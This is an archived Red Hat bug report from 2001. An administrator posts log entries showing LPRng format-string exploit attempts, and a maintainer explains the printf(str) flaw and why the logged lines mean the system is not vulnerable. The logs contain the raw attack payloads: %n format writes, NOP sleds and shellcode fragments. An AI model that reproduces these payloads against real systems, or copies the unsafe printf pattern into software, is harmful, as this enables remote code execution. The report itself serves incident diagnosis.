Bug 35634 - a new LPRng exploit?
Summary: a new LPRng exploit?
Status: CLOSED NOTABUG
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: LPRng (Show other bugs)
(Show other bugs)
Version: 7.0
Hardware: i386 Linux
medium
medium
Target Milestone: ---
Assignee: Crutcher Dunnavant
QA Contact: David Lawrence
URL:
Whiteboard:
Keywords: Security
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2001-04-11 14:17 UTC by Paul Johnson
Modified: 2007-04-18 16:32 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2001-04-11 14:17:56 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

Description Paul Johnson 2001-04-11 14:17:52 UTC
From Bugzilla Helper:
User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.2.16-22 i686)


Yesterday, on my fully updated RH system, lines like this started showing
up in /var/log/messages.  I realize they are symptoms of an LPRng exploit
that was discovered in November, 2000, but they are happening again on my
system.

Apr  9 04:15:11 dv46m61 SERVER[20197]: Dispatch_input: bad request line
'BB\s?]s?^s?_s?XXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2201[1I1@0FM\200\211e1R2f\211P1I\211KC\211]xC\211]tK\211M|\215MtM\2001I\211
Apr  9 04:15:14 dv46m61 SERVER[20198]: Dispatch_input: bad request line
'BB(q?)q?*q?+q?XXXXXXXXXXXXXXXXXX%.232u%300$n%.199u%301$nsecurity.i%302$n%.192u%303$n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2201[1I1@0FM\200\211e1R2f\211P1I\211KC\211]xC\211]tK\211M|\215MtM\2001I


Reproducible: Always
Steps to Reproduce:
1. open /var/log/messages
2. take a look for Dispatch_input: bad request line
3.
	

Actual Results:  have i been hacked?  This same thing has started appearing
on 2 RedHat systems that I administer.

# rpm -q LPRng
LPRng-3.6.24-2

Comment 1 Crutcher Dunnavant 2001-04-11 18:51:04 UTC
No, but someone is attacking.

The exploit in question was a vulnerability in the way LPRng logged messages,
namely that it treated an error string (the bad request line) as a format string.

For C hackers, this means the differance between:
	printf(str) and printf("%s", str)

to exploit it, you have to get the program to try and print the string. So if
you see error message with formatting escapes like:

	%.21u
	\s
	\220

you know that you are /not/ vulnerable, because those commands would have been
interpretted, instead of printed, on a vulnerable box.


Note You need to log in before you can comment on or make changes to this bug.